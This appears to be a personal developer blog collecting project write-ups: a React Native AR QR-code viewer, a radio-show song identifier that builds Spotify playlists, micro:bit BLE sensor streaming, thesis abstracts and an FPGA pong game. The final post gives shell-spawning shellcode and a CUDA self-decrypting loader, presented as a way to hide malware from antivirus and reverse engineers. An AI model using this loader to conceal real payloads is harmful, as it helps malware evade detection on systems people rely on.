AR app for displaying images from QR codes in React Native

As part of a side project I’m working on, I had to create an augmented reality application that reads QR codes containing image URIs and displays the images on screen. I have some experience in Android development with Android Studio and Java, but I wanted to use a cross-platform framework that targets both iOS and Android, as the app itself was only going to be used as a demo. There are a lot of platforms available, but since I had no experience with any of them I tried my luck with React Native, a cross-platform framework created by Facebook and based on JavaScript.

After skimming through the official documentation, I created a new React Native project using

expo init ARQRCodes

and I was ready to analyze my requirements and start coding.

The app has two main features:

  • Use the camera to find and track QR codes
  • Get the image URI and display it on top of the QR code

For tracking and scanning QR codes I used react-native-camera, a package that supports barcode scanning out of the box. Installing React Native packages is quite easy, and in this particular case I used

yarn add react-native-camera@git+https://git@github.com/react-native-community/react-native-camera.git

as I wanted to try out the master branch. After installing the package, enabling the camera was done by using the RNCamera tag and setting all the relevant props, as seen below:

import { RNCamera } from 'react-native-camera';

<RNCamera
  ref={ref => {
    this.camera = ref;
  }}
  style={styles.camera}
  type={RNCamera.Constants.Type.back}
  onGoogleVisionBarcodesDetected={ this.barcodeDetected }
  googleVisionBarcodeType={RNCamera.Constants.GoogleVisionBarcodeDetection.BarcodeType.QR_CODE}>
</RNCamera>

Some things to note are the ‘googleVisionBarcodeType’ constraint, which in my case restricts detection to QR codes, and the ‘onGoogleVisionBarcodesDetected’ callback, which gets invoked every time a QR code is identified.

Before moving forward I also had to update the ios/Podfile and run pod install, as the development happened mostly on a MacBook:

pod 'react-native-camera', path: '../node_modules/react-native-camera', subspecs: [
    'BarcodeDetectorMLKit'
]

Of course, accessing the camera requires permissions on both Android and iOS, so in order to make development easier I used react-native-permissions. Once installed with yarn, I had to update my Podfile, Xcode project and AndroidManifest.xml in order to ask for camera permissions, and add the following code to my App.js:

import { Platform } from 'react-native';
import { request, PERMISSIONS } from 'react-native-permissions';

request(Platform.OS === 'ios' ? PERMISSIONS.IOS.CAMERA : PERMISSIONS.ANDROID.CAMERA).then((result) => {
   setPermissionResult(result)
});

Note that RNCamera requests audio permissions by default, so I had to disable audio capture by adding this prop to the RNCamera tag:

captureAudio={false}

Once I had a way to identify QR codes, the next step was to get the URIs and display them on the screen. Downloading and displaying an image was again very easily done using another great package called react-native-fast-image, which also handles image caching. A code sample for doing this:

import FastImage from 'react-native-fast-image';

<FastImage
    style={styles.image}
    source={{ 
         uri: data,
         priority: FastImage.priority.normal,
    }}
    resizeMode={FastImage.resizeMode.contain}
/>

Once I had the building blocks ready, the next step was to put everything together. First, I had to implement my callback function, barcodeDetected, in order to update and re-render the app. This is done by calling setState and passing the new barcode information:

barcodeDetected = ({ barcodes }) => {
    this.setState({ barcodes })
};

Next, I used the barcode information to draw the images on the screen using the FastImage package. After running a few tests, I was ready to try it on my phone with various QR codes that I generated online using one of the many free websites that offer this functionality, hoping that multiple QR codes at once would render their images without any problems.

Here are the generated QR codes

and sure enough, when I tested the app on my phone, I was quite satisfied with the result!

Scanning three QR codes at the same time and displaying the images on screen.

Coming from a quite different background, as I mostly work with low-level languages like C/C++, at first I thought that this project would be a big challenge since I had never worked with JavaScript before. However, it turns out that modern frameworks make development very easy and quite fast. Being able to hack together a working app like this in two days without any prior knowledge shows how far things have come.

You can find the complete code on GitHub and the app on Google’s Play Store (will update with the link once it’s approved).

Creating a Spotify playlist from a radio show

Recently, I discovered a very interesting radio show hosted by Giannis Petridis on ERT. Giannis hosts one of the longest-running radio shows in Greece and has one of the biggest record collections in the world. In his show he mostly suggests new artists and albums that are not promoted by mainstream media, so it’s a great way to discover new music. After listening to a few of his shows I found some hidden gems, so I started thinking of a way to extract all this information without having to listen to every show.

Data collection

Fortunately a lot of the shows are available on demand, so the first step was to download everything locally. ERT’s website hosts the shows from 2017 up until today. After fiddling around the website I found that you can access each .mp3 file directly through a specific URL. The URLs follow a rather simple naming scheme, which is {year}{month}{day} plus some constant text. In order to store them locally I wrote this simple Python script.

#!/usr/bin/python3

import requests

url = "https://audio.ert.gr/radio/proto/apo-tis-4-stis-5/{}{}{}-apo-tis-4-stis-5.mp3"

# Iterate through available dates
for year in range(2017, 2021):
    for month in range(1, 13):
        for day in range(1, 32):
            month_s = str(month)
            day_s = str(day)
            if month < 10:
                month_s = "0" + month_s
            if day < 10:
                day_s = "0" + day_s
            url_to_dl = url.format(str(year), month_s, day_s)
            response = requests.get(url_to_dl)
            total = response.headers.get('content-length')
            print(url_to_dl)
            if total is None:
                print("File not found")
            else:
                with open("./{}{}{}.mp3".format(str(year), month_s, day_s), 'wb') as f:
                    for data in response.iter_content(chunk_size=2048):
                        f.write(data)


After running the script for a while I ended up with 662 .mp3 files (~40 GB) that I somehow had to analyze to extract the metadata.

Analyzing Data

The first thing that came to mind was to use a service like Shazam. Shazam is a music identification service: by submitting a short sample of audio, it can identify which song it is. An interesting article about how audio identification works can be found here: https://oxygene.sk/2011/01/how-does-chromaprint-work/

Unfortunately Shazam does not offer an API, but there are other services we can use. I had a look at AcoustID, an open-source audio identification service that comes with an open library of fingerprints, but the drawback is that it matches only full-length songs, which means I could not use it in the context of a radio show.

I ended up with AudD, a paid service that provides a very simple API for identifying audio files. My first approach was to split each radio show into 10-second segments and scan one in every 10 segments, in order to reduce the number of requests while making sure I wasn’t skipping any song. For splitting the tracks I used pydub.

The python script for doing this can be seen below.

#!/usr/bin/python3

import requests
import os
from pydub import AudioSegment

data = {
    'api_token': 'XXXXXXXXXXXXXXX',
    'return': 'apple_music,spotify',
}

# Iterate through files
directory = os.fsencode('.')

for file in os.listdir(directory):
    filename = os.fsdecode(file)
    filename_out = os.path.splitext(filename)[0] + '.json'
    if filename.endswith('.mp3'):
        print('Splitting: ' + filename)
        radio_show = AudioSegment.from_mp3(filename)
        # Split the audio into 10 sec chunks and only send 1 chunk in every 10.
        with open(filename_out, 'a+') as out_f:
            for i, chunk in enumerate(radio_show[::10000]):
                if i % 10:
                    continue
                chunk.export('temp.mp3', format='mp3')
                with open('temp.mp3', 'rb') as chunk_f:
                    result = requests.post('https://api.audd.io/', data=data, files={'file': chunk_f})
                out_f.write(result.text)

The total number of requests needed is around 166K, which based on the service’s pricing would cost $840. I tried to further reduce the requests by using one segment every 3 minutes, under the assumption that each track is more than 3 minutes long. This drops the requests to ~55K, but I still needed something better.

Speech Segmentation

Ideally I’d want to split every raw file into segments of speech and music. This falls under the field of Speech Segmentation and, as with everything nowadays, there is a pre-trained Python module called inaSpeechSegmenter that can detect speech, music and speaker gender. After setting it up, the first thing was to try to segment a single radio show and check whether the results were correct.

Running the code snippet below,

from inaSpeechSegmenter import Segmenter, seg2csv
media = './media/musanmix.mp3'
seg = Segmenter()
segmentation = seg(media)
print(segmentation)

yields the first results:

[('noEnergy', 0.0, 0.6), ('music', 0.6, 64.28), ('male', 64.28, 66.7), ('noEnergy', 66.7, 67.34), ('male', 67.34, 68.72), ('noEnergy', 68.72, 69.24), ('male', 69.24, 75.34), ('noEnergy', 75.34, 76.3), ('male', 76.3, 78.38), ('noEnergy', 78.38, 78.76), ('noise', 78.76, 79.08), ('noEnergy', 79.08, 79.52), ('male', 79.52, 84.5), ('noEnergy', 84.5, 86.06), ('male', 86.06, 88.08), ('noEnergy', 88.08, 88.7), ('male', 88.7, 90.9), ('noEnergy', 90.9, 91.60000000000001), ('male', 91.60000000000001, 95.06), ('noEnergy', 95.06, 96.06), ('music', 96.06, 128.9), ('male', 128.9, 144.04), ('noEnergy', 144.04, 144.68), ('male', 144.68, 155.4), ('noEnergy', 155.4, 156.58), ('male', 156.58, 158.34), ('noEnergy', 158.34, 158.96), ('male', 158.96, 160.38), ('noEnergy', 160.38, 160.88), ('male', 160.88, 162.86), ('noEnergy', 162.86, 164.22), ('male', 164.22, 166.34), ('noEnergy', 166.34, 167.48), ('male', 167.48, 179.72), ('noEnergy', 179.72, 180.74), ('male', 180.74, 182.42000000000002), ('noEnergy', 182.42000000000002, 184.0), ('male', 184.0, 198.4), ('noEnergy', 198.4, 198.84), ('male', 198.84, 212.34), ('noEnergy', 212.34, 212.72), ('male', 212.72, 274.08), ('music', 274.08, 279.26), ('noise', 279.26, 287.88), ('music', 287.88, 289.78000000000003), ('noise', 289.78000000000003, 292.38), ('music', 292.38, 298.5), ('male', 298.5, 309.74), ('noEnergy', 309.74, 310.32), ('male', 310.32, 362.06), ('noEnergy', 362.06, 362.7), ('male', 362.7, 364.0), ('noEnergy', 364.0, 364.66), ('male', 364.66, 406.46000000000004), ('noEnergy', 406.46000000000004, 406.96000000000004), ('male', 406.96000000000004, 494.76), ('noEnergy', 494.76, 495.22), ('male', 495.22, 503.76), ('noEnergy', 503.76, 504.24), ('male', 504.24, 553.1800000000001), ('noEnergy', 553.1800000000001, 554.16), ('male', 554.16, 563.6), ('female', 563.6, 568.66), ('male', 568.66, 581.78), ('noEnergy', 581.78, 582.22), ('male', 582.22, 601.22), ('noEnergy', 601.22, 601.6800000000001), ('male', 601.6800000000001, 606.44), ('noEnergy', 606.44, 607.14), ('male', 607.14, 607.66), ('noEnergy', 607.66, 608.0600000000001), ('male', 608.0600000000001, 643.32), ('noEnergy', 643.32, 643.72), ('male', 643.72, 647.1800000000001), ('noEnergy', 647.1800000000001, 647.76), ('male', 647.76, 665.88), ('noEnergy', 665.88, 666.3000000000001), ('male', 666.3000000000001, 694.38), ('noEnergy', 694.38, 694.78), ('male', 694.78, 712.02), ('noEnergy', 712.02, 712.46), ('male', 712.46, 760.72), ('noEnergy', 760.72, 762.3000000000001), ('noise', 762.3000000000001, 772.66), ('music', 772.66, 877.4200000000001), ('noise', 877.4200000000001, 881.9200000000001), ('noEnergy', 881.9200000000001, 882.52), ('male', 882.52, 916.12), ('noEnergy', 916.12, 916.62), ('male', 916.62, 928.74), ('noEnergy', 928.74, 929.3000000000001), ('male', 929.3000000000001, 940.4200000000001), ('noEnergy', 940.4200000000001, 941.12), ('male', 941.12, 943.38), ('noEnergy', 943.38, 943.84), ('male', 943.84, 963.46), ('music', 963.46, 1185.58), ('noEnergy', 1185.58, 1187.22), ('music', 1187.22, 1202.66), ('male', 1202.66, 1215.08), ('music', 1215.08, 1221.34), ('male', 1221.34, 1254.8600000000001), ('music', 1254.8600000000001, 1258.84), ('male', 1258.84, 1296.72), ('music', 1296.72, 1432.38), ('male', 1432.38, 1467.04), ('noEnergy', 1467.04, 1467.58), ('male', 1467.58, 1473.68), ('noEnergy', 1473.68, 1474.76), ('male', 1474.76, 1480.68), ('music', 1480.68, 1490.84), ('male', 1490.84, 1493.14), ('music', 1493.14, 1762.32), ('male', 1762.32, 1781.02), ('noEnergy', 1781.02, 1781.72), ('male', 1781.72, 1817.4), 
('noEnergy', 1817.4, 1818.26), ('male', 1818.26, 1826.16), ('noEnergy', 1826.16, 1827.1000000000001), ('male', 1827.1000000000001, 1828.02), ('noEnergy', 1828.02, 1828.48), ('male', 1828.48, 1831.06), ('noEnergy', 1831.06, 1831.6000000000001), ('music', 1831.6000000000001, 1835.74), ('male', 1835.74, 1838.78), ('music', 1838.78, 1841.28), ('male', 1841.28, 1847.22), ('music', 1847.22, 2053.06), ('male', 2053.06, 2058.02), ('music', 2058.02, 2059.38), ('male', 2059.38, 2090.3), ('noEnergy', 2090.3, 2090.7), ('male', 2090.7, 2098.68), ('noEnergy', 2098.68, 2099.92), ('male', 2099.92, 2105.68), ('noEnergy', 2105.68, 2106.76), ('male', 2106.76, 2110.16), ('noEnergy', 2110.16, 2111.0), ('male', 2111.0, 2115.2200000000003), ('noEnergy', 2115.2200000000003, 2116.44), ('male', 2116.44, 2127.06), ('music', 2127.06, 2130.8), ('male', 2130.8, 2132.44), ('music', 2132.44, 2309.18), ('male', 2309.18, 2346.04), ('noEnergy', 2346.04, 2346.44), ('male', 2346.44, 2352.9), ('noEnergy', 2352.9, 2354.38), ('male', 2354.38, 2383.58), ('music', 2383.58, 2474.7200000000003), ('male', 2474.7200000000003, 2513.5), ('noEnergy', 2513.5, 2514.2200000000003), ('male', 2514.2200000000003, 2538.7000000000003), ('noEnergy', 2538.7000000000003, 2541.9), ('male', 2541.9, 2546.0), ('music', 2546.0, 2547.7200000000003), ('female', 2547.7200000000003, 2548.64), ('noEnergy', 2548.64, 2550.12), ('music', 2550.12, 2618.9), ('noEnergy', 2618.9, 2619.78), ('music', 2619.78, 2666.78), ('noEnergy', 2666.78, 2667.66), ('music', 2667.66, 2762.86), ('noEnergy', 2762.86, 2764.2400000000002), ('music', 2764.2400000000002, 2778.4), ('noEnergy', 2778.4, 2779.62), ('music', 2779.62, 2804.2400000000002), ('noEnergy', 2804.2400000000002, 2806.64)]

Opening the file, I was happy to verify that the music segments matched exactly. Putting everything together, I created a script that takes a 10-second sample from each music segment and sends it to AudD for identification.

#!/usr/bin/python3

import requests
import os
import sys
from inaSpeechSegmenter import Segmenter, seg2csv
from pydub import AudioSegment

data = {
    'api_token': 'XXXXXXXXXXXXXXX',
    'return': 'spotify',
}

if (len(sys.argv)) < 3:
    print('Usage: ' + sys.argv[0] + ' <input.mp3> <output.json>')
    sys.exit(0)

filename = sys.argv[1]
filename_out = sys.argv[2]

# Segment audio
seg = Segmenter()
segmentation = seg(filename)

# Get music timestamps and keep only
# the ones that are >10s
music_timestamps = [m for m in segmentation if ((m[0] == 'music') and (m[2] - m[1] > 10))]

total_requests = 0

# Iterate timestamps and send for identification
radio_show = AudioSegment.from_mp3(filename)

with open(filename_out, 'a+') as out_f:
    for m in music_timestamps:
        start_ms = int(m[1] * 1000)
        chunk = radio_show[start_ms:start_ms + 10000]
        chunk.export('temp.mp3', format='mp3')
        with open('temp.mp3', 'rb') as chunk_f:
            result = requests.post('https://api.audd.io/', data=data, files={'file': chunk_f})
        total_requests += 1
        out_f.write(result.text)

print(total_requests)

Spotify playlist

After I got the JSON responses with the songs, the next step was to create a Spotify playlist. First, I had to register a new app on Spotify for Developers

and then I used spotipy in order to access the API and add the tracks to my playlist:

#!/usr/bin/python3

import spotipy
from spotipy.oauth2 import SpotifyOAuth

sp = spotipy.Spotify(auth_manager=SpotifyOAuth(client_id="XXXX",
                                               client_secret="XXXX",
                                               redirect_uri="https://mispyrou.com",
                                               scope="playlist-modify-private playlist-modify-public",
                                               open_browser=False))

playlist_url = 'https://open.spotify.com/playlist/66bZtV2zrv49F28hS8ffbk'
username = 'mpekatsoula'

track_ids = ['TRACK_01', 'TRACK_02']
results = sp.user_playlist_add_tracks(username, playlist_url, track_ids)
 

After putting everything together, and after making sure that I don’t add any duplicate songs, it was time to run the script. Running it on a single 60-minute radio show takes around 2 minutes on an NVIDIA GTX 1060, which is quite reasonable.
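
The de-duplication step isn’t shown above, so here is a minimal sketch of how it can look (my own illustration, with a couple of assumptions: the .json files are the ones written by the identification scripts, and each AudD response exposes the Spotify track ID under result.spotify.id when ‘spotify’ is requested in the ‘return’ field):

#!/usr/bin/python3

import glob
import json

decoder = json.JSONDecoder()
seen = set()
track_ids = []

# The output files are concatenations of JSON responses, so decode them one by one.
for path in glob.glob('./*.json'):
    with open(path) as f:
        text = f.read()
    pos = 0
    while pos < len(text):
        try:
            obj, pos = decoder.raw_decode(text, pos)
        except json.JSONDecodeError:
            pos += 1
            continue
        result = obj.get('result') or {}
        spotify = result.get('spotify') or {}
        track_id = spotify.get('id')
        if track_id and track_id not in seen:
            seen.add(track_id)
            track_ids.append(track_id)

print(len(track_ids), 'unique tracks')

The resulting list can then be passed to sp.user_playlist_add_tracks; keep in mind that Spotify accepts at most 100 tracks per call, so longer lists have to be added in batches.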

The generated Spotify playlist

And in case you are still wondering, I managed to drop my total requests to AudD to ~10K!

Transmitting EMG data over BLE using BBC micro:bit

Recently I took part in a challenge organized by ARM Ltd which involved using a BBC micro:bit as the main processing board in an EMG sensor device. The device sends electrode sensor readings over BLE to an Android phone, and the data are then displayed on a real-time graph. This project was done in collaboration with Thomas Poulet and George Kopanas. The overall project setup is shown in the picture below:

You can find more info about the EMG sensors and how they are connected to the micro:bit here.

Bluetooth low energy

The BBC micro:bit comes with a Bluetooth Low Energy (BLE) radio, which is designed for reduced power consumption, making it perfect for our use case, as we need to continuously transmit EMG sensor data. The micro:bit is configured as a server that waits for GATT requests and sends data, and our Android phone is the client that initiates the connection and receives the data from the EMG sensor. We use Nordic’s nRF UART over BLE in order to transmit data.

Transmitting data through RX Characteristic

Connecting the phone with the micro:bit is pretty trivial on Android. There is a code sample from Google and you can find all the required information on their developer site.

First we have to scan for the available devices and then select the one we want to connect to (in our case the micro:bit). After the connection is initialized we enable indications by setting the ENABLE_INDICATION_VALUE flag and wait for data sent from the micro:bit. Data are sent on the RX characteristic (UUID: 6E400003-B5A3-F393-E0A9-E50E24DCCA9E) and are then plotted on the phone screen using GraphView.

Here are some pictures and a video of how things look when everything is connected:

Runtime support for approximate computing in heterogeneous systems

In my MSc thesis, titled “Runtime support for approximate computing in heterogeneous systems”, I developed a run-time system in the C programming language that supports approximate computations using OpenCL.

Abstract

Energy efficiency is the most important aspect of today’s systems, ranging from embedded devices to high-performance computers. However, the end of Dennard scaling limits expectations for energy-efficiency improvements in future devices, despite manufacturing processors at smaller geometries and lowering supply voltages. Many recent systems use a wide range of power-management techniques, such as DFS and DVFS, in order to balance the demanding need for higher performance/throughput against the impact of aggressive power consumption and negative thermal effects. However, these techniques have their limitations when it comes to CPU-intensive workloads.

Heterogeneous systems appeared as a promising alternative to multicores and multiprocessors. They offer unprecedented performance and energy efficiency for certain classes of workloads, albeit at significantly increased development effort: programmers have to spend significant effort reasoning about code mapping and optimization, synchronization, and data transfers among different devices and address spaces. One contributing factor to the energy footprint of current software is that all parts of the program are considered equally important for the quality of the final result, and thus all are executed at full accuracy. Some application domains, such as big data, video and image processing, are amenable to approximations, meaning that some portions of the application can be executed with less accuracy without having a big impact on the output result.

In this MSc thesis we designed and implemented a runtime system which serves as the back-end for the compilation and profiling infrastructure of a task-based meta-programming model on top of OpenCL. We give the programmer the opportunity to provide approximate functions that require less energy, as well as the freedom to express the relative importance of different computations for the quality of the output, thus facilitating the dynamic exploration of energy/quality trade-offs in a disciplined way. We also simplify the development of parallel algorithms on heterogeneous systems, relieving the programmer from tasks such as work scheduling and data manipulation across address spaces. We evaluate our approach using a number of real-world applications from domains such as finance, computer vision, iterative equation solvers and computer simulation.

Our results indicate that significant energy savings can be achieved by combining execution on heterogeneous systems with approximations, with graceful degradation of output quality. Also, hiding the underlying memory hierarchy from the programmer and performing data-dependency analysis and work scheduling transparently results in faster development without sacrificing application performance.

Performance and power prediction on heterogeneous systems using statistical methods

Abstract

Heterogeneous systems provide high computing performance, combining low cost and low power consumption. These systems include various computational resources with different architectures, such as CPUs, GPUs, DSPs or FPGAs. It is crucial to have full knowledge of these architectures, as well as of the programming models used, in order to increase the performance of a heterogeneous system.

One way to achieve this goal is to predict the execution time on the different computational resources, using statistics collected through hardware counters. The purpose of this thesis is to increase the performance of a heterogeneous system by training a statistical model on the collected data to predict the execution time. A further goal is to use this prediction model inside a run-time scheduler which migrates the running application in order to decrease the execution time and increase the overall performance.

We used various statistical models, such as linear regression, neural networks and random forests, and predicted the execution time on Intel CPUs and NVIDIA GPUs, with different levels of success.

Two player pong game using accelerometers

This two-person project was completed for the Embedded Systems course at the University of Thessaly, Department of Computer Engineering. In the context of this project we implemented the classic pong game using a Spartan 6 FPGA and two 3-axis accelerometers. The code is written in Verilog and you can find it on GitHub (link at the bottom of the page). The project consists of two parts: the connection to the monitor through VGA together with the game logic, and the connection of the accelerometers through the SPI interface.

VGA Technology and Implementation

The first part of the project was to connect the FPGA to a monitor using the VGA output. VGA is a video standard, introduced by IBM in 1987, mainly used for computer monitors.

VGA video is a stream of frames. Each frame is made of horizontal and vertical series of pixels which are transmitted from top to bottom and from left to right, as if a beam were traveling across the screen (CRT displays actually used a moving electron beam, but LCD displays have evolved to use the same signal timings as CRT displays). Information is only displayed while the beam is moving forward, not during the time the beam is reset back to the left or top edge of the display.

First we made a VGA controller module that generates the correct signals. The signals that we need to pass to the VGA DAC (Digital to Analog Converter) are:

• Pixel clock
• Vertical Sync
• Horizontal Sync
• 3-bit Red
• 3-bit Green
• 2-bit Blue

The pixel clock defines the time available to display one pixel of information. With different timing values we can achieve several resolutions, such as 800×600 etc. Vertical sync defines the refresh rate of the display, and horizontal sync is used to indicate the end of a horizontal line. We use two counters, hcount and vcount, that count the pixels along the horizontal and vertical lines. By combining these two counters we can determine the (x, y) location of a pixel on the screen.

Each line of the video begins with an active video region, in which RGB values are output for each pixel in the line. Then a blanking region follows, in which a horizontal sync pulse is transmitted in the middle of the blanking interval. The interval before the sync pulse is known as the front porch and the one after the sync pulse as the back porch.

There are many VGA timing values that can be used, in order to support several resolutions, as we can see in the table below:

For our project we used a resolution of 800×600@72Hz, so we generated a 50 MHz pixel clock from the 100 MHz clock input of the Spartan 6, and the horizontal and vertical counters count up to a total value of 1039 and 665 respectively. Based on these numbers we calculate the exact intervals during which hsync and vsync are set active high (both signals must be active high at this resolution) and we connect them to the FPGA pins.
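
As a quick sanity check of these numbers (a small Python sketch, not part of the Verilog project): a 50 MHz pixel clock with counters that wrap at 1039 and 665 gives 1040 pixel clocks per line and 666 lines per frame, which lands right at the expected ~72 Hz refresh rate.

#!/usr/bin/python3

# Back-of-the-envelope check of the 800x600@72Hz timings used above.
pixel_clock_hz = 50_000_000   # 50 MHz pixel clock
h_total = 1039 + 1            # horizontal counter wraps at 1039 -> 1040 clocks per line
v_total = 665 + 1             # vertical counter wraps at 665 -> 666 lines per frame

line_rate_hz = pixel_clock_hz / h_total
refresh_rate_hz = line_rate_hz / v_total

print(round(line_rate_hz / 1000, 1), 'kHz line rate')    # ~48.1 kHz
print(round(refresh_rate_hz, 1), 'Hz refresh rate')      # ~72.2 Hz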

Pong Game

Based on the VGA module we draw basic shapes on the screen, such as the paddles and a square dot that represents the ball. The paddle drawing is done in the draw_shape module which, given the (x, y) position of the top-left pixel, creates a 128×16-pixel rectangle. The same happens with the ball, which is 32×32 pixels. We also have a module that creates the game board: four lines for the perimeter of the screen and one vertical line at the middle of the board. Each of these modules outputs the pixel locations of its shape.

The Ball_movement module takes as input the locations of the paddles and the ball and does the necessary calculations for the ball movement. The ball moves at a constant speed of one pixel on the x axis and one pixel on the y axis. If the ball hits the upper or lower board limit or one of the paddles, its trajectory changes. In this module we also check whether the ball hits the right or left limit and, if so, a signal is generated to indicate that a player has won a point. Whenever a player wins, the score is updated and displayed on the screen. If a player’s score reaches 10 points, the game is over, a message indicating which player has lost is shown, and the game resets to its initial state. Finally, this module outputs the pixel locations of the ball and the paddles, which are driven to the output_pixels module that generates the final output displayed on the monitor.

A snippet of the code that checks if the ball has hit the paddle:

// Find collision between ball and the paddles
if ( ((ball_y <= paddle1 + 128) && ((ball_y >= paddle1 - 32) || (paddle1 <= 32 && ball_y <= 128))) && ball_x == 18 )
    sw_x <= 1;

if ( ((ball_y <= paddle2 + 128) && ((ball_y >= paddle2 - 32) || (paddle2 <= 32 && ball_y <= 128))) && ball_x == 750 )
    sw_x <= 0;

The numbers showing the score are output in seven-segment display format and are generated in the draw_score module. We also implemented a pause function, activated by switch T5.
Since the Nexys 3 board’s reset button completely erases any loaded program, we use switch V8 as the reset signal for our project.

3-Axis accelerometers

An accelerometer is an electromechanical device that measures acceleration forces. These forces may be static, like the constant force of gravity, or dynamic, caused by moving the accelerometer. There are different types of accelerometers depending on how they work. Some use the piezoelectric effect: they contain microscopic crystal structures that get stressed by accelerative forces, which causes a voltage to be generated. Others use capacitive sensing and output a voltage dependent on the distance between two planar surfaces.

In our implementation we used a 3-axis (one axis for each direction) digital accelerometer, the Analog Devices ADXL345, and took advantage of the force of gravity on the y axis, making the paddles move by tilting the accelerometer right or left. We connected the accelerometers through the SPI interface. SPI operates in full-duplex mode and uses four signals: slave select (SS), serial clock (SCLK), serial data out (SDO) to the accelerometer, and serial data in (SDI) from the accelerometer. Devices communicate in master/slave mode, where the master initiates the data frame. Our setup contains two shift registers, one in the master and one in the slave, connected as a ring. Data is shifted out with the most significant bit first, while a new least significant bit is shifted into the same register.

We initialize the transfer with a 5 Hz clock and we transmit/receive data at a 22.4 kHz rate. The accelerometer is configured for +/- 2g operation. To convert the output to g we have to find the difference between the measured output and the zero-g offset and divide it by the accelerometer’s sensitivity (expressed in counts/g or LSB/g). For our accelerometer at 2g sensitivity with 10-bit digital outputs, the sensitivity is 163 counts/g or LSB/g. The acceleration is therefore equal to a = (A_out − zero_g) / 163 g. We didn’t have to make those calculations for the paddle movement; we just take the accelerometer output and move the paddles accordingly, based on the table below:
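
Just to spell out that conversion with some made-up numbers (a throwaway sketch; in the game we skip this step entirely and map the raw readings directly to paddle movement):

#!/usr/bin/python3

# Example of the g-conversion above, with illustrative values.
sensitivity = 163   # counts per g (+/-2g range, 10-bit output, as stated above)
zero_g = 0          # zero-g offset in counts (device and axis dependent)
a_out = 163         # a made-up raw reading from the accelerometer

a = (a_out - zero_g) / sensitivity
print(a, 'g')       # -> 1.0 g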

Verilog Diagrams

In-game screenshots:

GPU assisted ELF binary decryption

Usually a malware writer, or a closed-source product, uses techniques to make the binaries difficult to read. On one hand, the anti-virus is unable to read the signature of the malware and, on the other, a reverse engineer’s life becomes difficult.
One technique (usually not used alone) is to encrypt some portions of the code and decrypt them at runtime, or better, decrypt only the code we want to run each time and then encrypt it back.
As GPUs have extremely high computational power, we can use really complex functions for encrypting and decrypting our code. I’ve made a really simple example of a self-decrypting application and I’ll try to explain it step by step.

So, what is our program going to do? Well, it will spawn a shell. The assembly code to do that (we write it in assembly so that it stays portable) is:

global _shell
 
_shell:
xor ecx, ecx
mul ecx
push ecx
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
mov al, 11
int 0x80

You can find code like this freely available on the internet (this one was written by kernel panik), or you can write your own if you want something more specific (or just want to learn). We want our code to be portable and free of relative addresses.

Now that we have our assembly code, we compile it to an object file:

nasm shell.asm -f elf32 -o shell.o

Then, we have to write code for the self-decrypting binary. A simple example can be found below, written in C for CUDA:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <cuda.h>
 
#define len 21
 
// Each thread decrypts one byte of the code (simple XOR with a fixed key).
__global__ void decrypt(unsigned char *code){
    int indx = threadIdx.x;
    code[indx] ^= 12;
}
 
extern "C" void _shell();
 
int main(void){
 
    unsigned char *p = (unsigned char*)_shell;
    unsigned char *d_shell, *h_shell;
 
    // Copy the (encrypted) opcodes of _shell into a host buffer.
    h_shell = (unsigned char *)malloc(sizeof(char)*len);
    int i;
    for(i=0;i<len;i++){
        h_shell[i] = *p;
        p++;
    }

    // Send the buffer to the GPU, decrypt it there and copy it back.
    cudaMalloc((void **) &d_shell, sizeof(char)*len);
    cudaMemcpy(d_shell, h_shell, sizeof(char)*len, cudaMemcpyHostToDevice);
    decrypt<<<1,len>>>(d_shell);
    cudaMemcpy(h_shell, d_shell, sizeof(char)*len, cudaMemcpyDeviceToHost);
    cudaFree(d_shell);

    // Map an executable region, copy the decrypted code there and jump to it.
    char *d = (char *)mmap(NULL, len, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, -1, 0);
    memcpy(d, h_shell, len);
    ((void(*)(void))d)();
}

Now let’s explain some things. First of all, we have to find the length of the instructions. There are a few ways to do this; I chose this project by oblique, https://github.com/oblique/insn_len, which does it very easily.

Now, some of you may wonder why I am mmap-ing and memcpy-ing. Well, there are protections in place that prevent us from writing to some portions of memory, such as .text. So we have to load our encrypted code, decrypt it and copy it into a newly mmap-ed region of memory that can be executed; this is what the PROT_READ|PROT_WRITE|PROT_EXEC flags are for. After that we are ready to execute our code.

In our example we use a simple XOR decryption with a fixed key, but you could use a more complex stream cipher like RC4 etc. You also don’t need to store the key in the binary; you can brute-force it until the code “makes sense”. With such computational power, that is pretty easy.

Now we compile our source code with nvcc and link it:

nvcc shell_spawn.cu -c
gcc shell_spawn.o shell.o -o shell_spawn -L/usr/local/cuda/lib -lcudart

And now we have our executable! But first we have to patch the binary with our encrypted function. The reason we use a stream cipher is that we do not want to change the size of the function and make things more complex. One simple way to patch our ELF binary is to open it with a hex editor (I used Bless) and find the code we want to patch. But how? It’s simple:

objdump -d -j .text shell_spawn

and if you search you will see the _shell function:

8048a30:    31 c9                  xor    %ecx,%ecx
8048a32:    f7 e1                  mul    %ecx
8048a34:    51                     push   %ecx
8048a35:    68 2f 2f 73 68         push   $0x68732f2f
8048a3a:    68 2f 62 69 6e         push   $0x6e69622f
8048a3f:    89 e3                  mov    %esp,%ebx
8048a41:    b0 0b                  mov    $0xb,%al
8048a43:    cd 80                  int    $0x80

Now we simply encrypt the opcodes. I used XOR with 12, so my output is this:

3dc5fbed5d6423237f6464236e656285efbc07c18c
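
Rather than computing these bytes by hand, a tiny helper script (added here just for illustration, not part of the original workflow) can produce them straight from the opcodes of _shell shown above:

#!/usr/bin/python3

# XOR-encrypt the _shell opcodes with the key 12 and print the patch bytes.
shellcode = bytes([
    0x31, 0xc9,                    # xor  ecx, ecx
    0xf7, 0xe1,                    # mul  ecx
    0x51,                          # push ecx
    0x68, 0x2f, 0x2f, 0x73, 0x68,  # push 0x68732f2f
    0x68, 0x2f, 0x62, 0x69, 0x6e,  # push 0x6e69622f
    0x89, 0xe3,                    # mov  ebx, esp
    0xb0, 0x0b,                    # mov  al, 11
    0xcd, 0x80,                    # int  0x80
])

encrypted = bytes(b ^ 12 for b in shellcode)
print(encrypted.hex())  # -> 3dc5fbed5d6423237f6464236e656285efbc07c18c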

We open our hex editor, load our binary and replace our old _shell function with our encrypted one:

After that we save our file and if we execute it we can see that a shell spawns!

If we objdump our file, we can see our function _shell, but this time it does random stuff:

8048a30:    3d c5 fb ed 5d  cmp  $0x5dedfbc5,%eax
8048a35:    64 23 23        and  %fs:(%ebx),%esp
8048a38:    7f 64           jg 8048a9e <__libc_csu_init+0x4e>
